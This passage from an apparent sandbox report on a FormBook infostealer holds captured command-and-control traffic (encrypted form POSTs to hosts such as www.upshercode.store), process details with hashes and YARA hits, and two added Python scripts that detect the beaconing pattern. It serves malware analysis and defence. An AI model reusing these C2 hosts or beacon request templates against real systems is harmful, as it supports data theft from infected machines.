                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                   May 23, 2024 15:22:49.570089102 CEST | 1236 | IN | Data Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                   May 23, 2024 15:22:49.573481083 CEST | 1236 | IN | Data Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                  Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                   May 23, 2024 15:22:49.573517084 CEST | 115 | IN | Data Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                  Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   63 | 192.168.2.6 | 49769 | 162.240.81.188 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:51.493680954 CEST | 778 | OUT | POST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 4e 43 71 74 44 37 39 6e 72 33 4c 6f 2b 56 6a 38 6d 79 56 37 46 70 54 43 39 41 38 57 56 67 55 38 5a 55 42 36 49 37 79 62 4d 37 52 46 73 78 48 50 62 6a 77 55 45 35 79 6e 49 77 38 63 57 70 35 69 41 6f 63 58 55 61 76 6d 2b 44 74 44 6e 46 51 77 56 32 33 52 77 4b 4d 47 67 34 41 64 77 54 51 78 70 6a 38 59 6b 2b 79 49 6e 6d 46 59 51 41 2f 41 42 78 47 61 71 50 73 2f 74 46 46 55 65 30 78 78 54 79 48 7a 42 69 4b 59 33 62 79 37 47 2f 77 49 5a 78 6b 51 68 61 74 69 73 31 68 61 72 74 6b 76 76 69 6c 36 34 58 46 66 67 6b 51 4c 32 53 76 6b 6a 37 6f 6c 63 63 39 41 3d 3d
                                  Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mNCqtD79nr3Lo+Vj8myV7FpTC9A8WVgU8ZUB6I7ybM7RFsxHPbjwUE5ynIw8cWp5iAocXUavm+DtDnFQwV23RwKMGg4AdwTQxpj8Yk+yInmFYQA/ABxGaqPs/tFFUe0xxTyHzBiKY3by7G/wIZxkQhatis1hartkvvil64XFfgkQL2Svkj7olcc9A==
                                   May 23, 2024 15:22:52.053009033 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:22:51 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                   May 23, 2024 15:22:52.054665089 CEST | 224 | IN | Data Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                   May 23, 2024 15:22:52.058073997 CEST | 1236 | IN | Data Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                  Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                   May 23, 2024 15:22:52.058090925 CEST | 1127 | IN | Data Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                  Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with
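
Every session above has the same shape regardless of host: a request carrying the fixed Internet Explorer 11 User-Agent string, a four-character directory such as /2oa4/, /klk7/, /88o1/ or /x98j/, and one form field named FNPd whose value is a base64-looking blob (the GET variant adds a short zdK0d parameter), all sent by the injected process at PID 3152 within roughly 40 seconds. Most hosts answered 301 or 404. FormBook is known to contact decoy domains alongside its real C2, so a non-200 reply does not clear a host; the rotation across several unrelated domains with an identical request template is the stronger signal. The Python below, an added example that is not part of the Joe Sandbox report and not FormBook's own code, turns that pattern into a detection over constructed request records modelled on these sessions. The 5-minute window, the 3-host threshold and the 32-character minimum value length are illustrative assumptions; the encrypted values are copied or shortened from the capture.

```python
"""Heuristic for FormBook-style HTTP beaconing (added example, not report code).

Constructed sample records mirror the captured sessions: same hosts, paths,
User-Agent and form field name. Thresholds are assumptions for illustration.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
SHORT_PATH = re.compile(r"^/[a-z0-9]{4}/$")        # /2oa4/, /klk7/, /88o1/, /x98j/
B64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")     # base64 alphabet, optional padding


@dataclass(frozen=True)
class HttpRequest:
    ts: datetime
    pid: int
    method: str
    host: str
    path: str
    user_agent: str
    query: str = ""   # raw query string (GET)
    body: str = ""    # raw form body (POST)


def split_form(raw: str) -> dict:
    """Split x-www-form-urlencoded data WITHOUT decoding, so the '+' and '='
    of a base64 payload survive (parse_qs would turn '+' into a space)."""
    fields = {}
    for pair in raw.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[key] = value
    return fields


def is_beacon_request(req: HttpRequest) -> bool:
    """IE11 UA + four-character directory + one or two base64-like form
    fields, at least one long enough to carry an encrypted record."""
    if req.user_agent != IE11_UA or not SHORT_PATH.match(req.path):
        return False
    fields = split_form({"GET": req.query, "POST": req.body}.get(req.method, ""))
    if not 1 <= len(fields) <= 2:
        return False
    values = list(fields.values())
    return all(B64ISH.match(v) for v in values) and max(map(len, values)) >= 32


def find_beaconing(requests, window=timedelta(minutes=5), min_hosts=3):
    """Per PID, flag beacon-like requests that rotate across >= min_hosts
    distinct hosts inside `window` while reusing the same field name on every
    host. Returns {pid: {"hosts": [...], "shared_keys": [...]}}."""
    by_pid = defaultdict(list)
    for r in sorted(requests, key=lambda r: r.ts):
        if is_beacon_request(r):
            by_pid[r.pid].append(r)
    hits = {}
    for pid, reqs in by_pid.items():
        for i, first in enumerate(reqs):
            burst = [r for r in reqs[i:] if r.ts - first.ts <= window]
            hosts = sorted({r.host for r in burst})
            if len(hosts) < min_hosts:
                continue
            keys_per_host = defaultdict(set)
            for r in burst:
                keys_per_host[r.host].update(split_form(r.body or r.query))
            shared = set.intersection(*keys_per_host.values())
            if shared:
                hits[pid] = {"hosts": hosts, "shared_keys": sorted(shared)}
                break
    return hits


def _t(hhmmss: str) -> datetime:
    return datetime.strptime("2024-05-23 " + hhmmss, "%Y-%m-%d %H:%M:%S")


# Constructed records modelled on sessions 56-63; payload values shortened.
SAMPLE = [
    HttpRequest(_t("15:22:17"), 3152, "POST", "www.fruitique.co.uk", "/2oa4/", IE11_UA,
                body="FNPd=v7CD083vuP2qKmPU5iMd0MW9YZ216s59dd0dv3mYcugw46zvVHosrTE2dHHRL2nlfZTBzwVI"),
    HttpRequest(_t("15:22:20"), 3152, "GET", "www.fruitique.co.uk", "/2oa4/", IE11_UA,
                query="zdK0d=M8mTZ0xHNd1dPVm&FNPd=i5qj3MbwnaqqZlaCzV8lkcyXWM7z5OtwAvMYuHy+Rs8D5dDCYTlmhW0rahL5OEPHZ4qZw"),
    HttpRequest(_t("15:22:26"), 3152, "POST", "www.isrninjas.com", "/klk7/", IE11_UA,
                body="FNPd=wfnUC3yxPf1ZAacEgsvs5Eha4vDMv7sEZCyGJX0zFIj0d9rLaYK/3vq3B8D2exkqv2I2CbSrL8xufGTWnI+CXKcjFnM"),
    HttpRequest(_t("15:22:34"), 3152, "GET", "www.isrninjas.com", "/klk7/", IE11_UA,
                query="FNPd=9dP0BDeQOeIgUtwHisb4+HhriuuC7aFbTiKeAEdqL4fJM7qIcfT3xserNr/6IBhXmDc0Se+gIKMrWWn6otGBJpYMdUchDVG2Mcac25kobj2gW5aJo9JvfS7IA0chOZVsE0AwxR4=&zdK0d=M8mTZ0xHNd1dPVm"),
    HttpRequest(_t("15:22:43"), 3152, "GET", "www.emgeecontracting.shop", "/88o1/", IE11_UA,
                query="FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm"),
    HttpRequest(_t("15:22:48"), 3152, "POST", "www.upshercode.store", "/x98j/", IE11_UA,
                body="FNPd=nhZ5J1hcIHrKYcnCidsSlPN1hFnd94oWYTq4xX/x4UZCko/78mr3Io+Vscn5bbFiTCw98T9gU4xUB+E7yqM4QVsJMvbt"),
    # Constructed benign traffic: an ordinary multi-field login form sent with
    # the same IE11 UA, and a browser GET with a different UA. Neither is flagged.
    HttpRequest(_t("15:23:05"), 4000, "POST", "intranet.example", "/auth/", IE11_UA,
                body="user=alice&password=hunter2&csrf=6f3a9c0d5e1b4a7f"),
    HttpRequest(_t("15:23:09"), 4000, "GET", "www.example.com", "/news/",
                "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0", query="id=42"),
]

if __name__ == "__main__":
    for pid, hit in find_beaconing(SAMPLE).items():
        print(f"PID {pid}: {len(hit['hosts'])} hosts, shared field(s) {hit['shared_keys']}")
        for host in hit["hosts"]:
            print("   ", host)
```

Two design points worth keeping in mind when adapting this: the form data is split without URL-decoding, because parse_qs would turn the '+' characters in the FormBook payload into spaces and break the base64 check; and the decision is made per process across hosts rather than per host, since a single POST to an unknown domain is not distinctive while the same field name hitting four unrelated domains from one PID in under a minute is. Correlating by PID only works where the sensor records the originating process, as the sandbox does here for PID 3152.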


                                   Session ID | Source IP | Source Port | Destination IP | Destination Port
                                   64 | 192.168.2.6 | 49770 | 162.240.81.188 | 80
                                   Timestamp | Bytes transferred | Direction | Data
                                   May 23, 2024 15:22:54.025618076 CEST | 1791 | OUT | POST /x98j/ HTTP/1.1
                                  Host: www.upshercode.store
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.upshercode.store
                                  Referer: http://www.upshercode.store/x98j/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Raw: 46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 56 43 71 66 37 37 38 45 7a 33 4b 6f 2b 56 39 73 6d 78 56 37 46 30 54 43 31 45 38 57 5a 65 55 36 64 55 41 5a 41 37 77 70 6f 37 59 46 73 78 49 76 62 69 2b 30 46 78 79 6e 59 4b 38 63 47 70 35 69 41 6f 63 52 59 61 73 79 53 44 76 44 6e 45 54 77 56 36 7a 52 77 75 4d 47 35 46 41 64 30 70 51 43 68 6a 39 34 30 2b 69 71 2f 6d 48 34 51 43 38 41 42 35 47 61 6e 58 73 2f 67 36 46 55 71 65 78 79 50 79 47 46 73 57 61 36 75 4d 73 62 4b 6a 74 37 39 72 67 56 5a 33 69 44 4d 51 68 4a 58 6c 6d 50 6a 62 70 74 59 4f 47 75 6f 6c 48 36 79 61 6b 6b 43 33 39 57 74 6c 68 34 70 33 39 4f 78 4b 36 52 5a 2f 52 7a 44 47 65 73 71 38 4f 39 46 73 31 59 71 53 6f 35 4d 44 49 63 38 50 4f 66 78 4a 68 31 55 76 64 50 67 6a 62 32 68 61 45 30 46 54 65 64 36 38 45 33 7a 6c 62 33 4c 71 5a 43 48 53 6c 69 67 70 72 61 42 73 64 41 79 39 46 70 73 30 49 68 62 56 42 78 37 52 6c 51 78 76 67 4d 31 78 43 38 62 48 66 [TRUNCATED]
                                   Data Ascii: FNPd=nhZ5J1hcIHrKY8XCg+USp/NqulndoIpfYTu4xSfh4mVCqf778Ez3Ko+V9smxV7F0TC1E8WZeU6dUAZA7wpo7YFsxIvbi+0FxynYK8cGp5iAocRYasySDvDnETwV6zRwuMG5FAd0pQChj940+iq/mH4QC8AB5GanXs/g6FUqexyPyGFsWa6uMsbKjt79rgVZ3iDMQhJXlmPjbptYOGuolH6yakkC39Wtlh4p39OxK6RZ/RzDGesq8O9Fs1YqSo5MDIc8POfxJh1UvdPgjb2haE0FTed68E3zlb3LqZCHSligpraBsdAy9Fps0IhbVBx7RlQxvgM1xC8bHf [TRUNCATED]
                                   May 23, 2024 15:22:54.593547106 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx/1.20.1
                                  Date: Thu, 23 May 2024 13:22:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 3650
                                  Connection: close
                                  ETag: "636d2d22-e42"
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                  May 23, 2024 15:22:54.594374895 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                  Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                  May 23, 2024 15:22:54.598418951 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                  Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                  May 23, 2024 15:22:54.598424911 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                  Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with
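The exchange above is the sample's first data POST: a single short form key ("FNPd") carrying a base64-looking blob, an IE11 Trident User-Agent, Origin and Referer pointing at the same path, and an nginx 404 page in reply. The following script is an added example, not part of the report or of Joe Sandbox's own tooling. It converts the report's "Data Raw" hex dump back into the request body, splits the form field without URL-decoding it, and scores the exchange against the traits visible in this capture. The hex prefix is copied from the "Data Raw" line above; the request line and Host header are not in this excerpt and are inferred from Origin/Referer, and the benign comparison request is constructed. The heuristics are analyst assumptions, not a vendor signature.

```python
import re
import string

# Request body hex copied from the report's "Data Raw" line above (first 50
# bytes only; the capture itself is truncated, so this is a prefix of the body).
DATA_RAW_PREFIX = (
    "46 4e 50 64 3d 6e 68 5a 35 4a 31 68 63 49 48 72 4b 59 38 58 43 67 2b 55 "
    "53 70 2f 4e 71 75 6c 6e 64 6f 49 70 66 59 54 75 34 78 53 66 68 34 6d 56 "
    "43 71 66"
)

# Constructed request/response metadata mirroring the headers shown above.
# The Host and request line are not in this excerpt; they are inferred from
# the Origin/Referer values.
SAMPLE_REQUEST = {
    "method": "POST",
    "path": "/x98j/",
    "headers": {
        "Host": "www.upshercode.store",
        "Connection": "close",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://www.upshercode.store",
        "Referer": "http://www.upshercode.store/x98j/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    },
}
SAMPLE_RESPONSE = {"status": 404, "headers": {"Server": "nginx/1.20.1",
                                              "Content-Type": "text/html"}}

# A constructed benign request for comparison.
BENIGN_REQUEST = {"method": "GET", "path": "/",
                  "headers": {"Host": "example.com", "User-Agent": "curl/8.4.0"}}
BENIGN_RESPONSE = {"status": 200, "headers": {"Content-Type": "text/html"}}

_B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def decode_data_raw(hex_dump: str) -> bytes:
    """Turn a space-separated 'Data Raw' hex dump back into the bytes on the wire."""
    return bytes.fromhex(hex_dump.replace(" ", ""))


def split_form_body(body: bytes):
    """Split '<key>=<value>' on the first '=' only. The value is deliberately not
    URL-decoded: '+' and '/' here are base64 alphabet characters, and decoding
    would turn every '+' into a space."""
    text = body.decode("ascii", errors="replace")
    key, sep, value = text.partition("=")
    return (key, value) if sep else (text, "")


def beacon_indicators(request: dict, response: dict, body: bytes) -> list:
    """Score an exchange against the traits visible in this capture. These are
    analyst heuristics (assumptions), not a vendor signature: one short
    alphabetic form key carrying a base64-looking blob, POSTed to a path that
    the Origin/Referer headers also name, with an IE11 Trident User-Agent and
    no cookie, answered with an HTML 404."""
    hdr = request["headers"]
    hits = []
    key, value = split_form_body(body)
    if (request["method"] == "POST"
            and hdr.get("Content-Type") == "application/x-www-form-urlencoded"):
        hits.append("form-encoded POST")
    if re.fullmatch(r"[A-Za-z]{2,8}", key) and value and set(value) <= _B64_ALPHABET:
        hits.append("single short key %r with base64-like value" % key)
    host = hdr.get("Host", "")
    if (host and hdr.get("Origin", "").endswith(host)
            and hdr.get("Referer", "").endswith(host + request["path"])):
        hits.append("Origin/Referer name the POST target itself")
    if "Trident/7.0" in hdr.get("User-Agent", "") and "Cookie" not in hdr:
        hits.append("IE11 Trident User-Agent with no cookie")
    if (response["status"] == 404
            and response["headers"].get("Content-Type", "").startswith("text/html")):
        hits.append("data POST answered with an HTML 404")
    return hits


def is_suspect(hits: list, threshold: int = 4) -> bool:
    """Require several independent traits before flagging, so an ordinary
    form submission to a site that happens to 404 is not enough on its own."""
    return len(hits) >= threshold


if __name__ == "__main__":
    body = decode_data_raw(DATA_RAW_PREFIX)
    print(split_form_body(body))
    for line in beacon_indicators(SAMPLE_REQUEST, SAMPLE_RESPONSE, body):
        print(" -", line)
```

Run stand-alone it prints the recovered ("FNPd", ...) pair and the five matching traits; the benign request matches none. The threshold matters: a 404 or a Trident User-Agent alone is common on any network, and it is the combination with a lone short key and a same-origin POST path that is worth an alert.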
                                  Target ID:0
                                  Start time:09:18:19
                                  Start date:23/05/2024
                                  Path:C:\Users\user\Desktop\PI No 20000814C.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PI No 20000814C.exe"
                                  Imagebase:0xf00000
                                  File size:691'200 bytes
                                  MD5 hash:FDDC263879FBF539B746D116E8429A7F
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  Target ID:2
                                  Start time:09:18:20
                                  Start date:23/05/2024
                                  Path:C:\Windows\SysWOW64\svchost.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\PI No 20000814C.exe"
                                  Imagebase:0xcd0000
                                  File size:46'504 bytes
                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                  Reputation:moderate
                                  Has exited:true

                                  Target ID:3
                                  Start time:09:18:28
                                  Start date:23/05/2024
                                  Path:C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe"
                                  Imagebase:0xb00000
                                  File size:140'800 bytes
                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                  Reputation:high
                                  Has exited:false

                                  Target ID:4
                                  Start time:09:18:29
                                  Start date:23/05/2024
                                  Path:C:\Windows\SysWOW64\cipher.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SysWOW64\cipher.exe"
                                  Imagebase:0xc00000
                                  File size:39'936 bytes
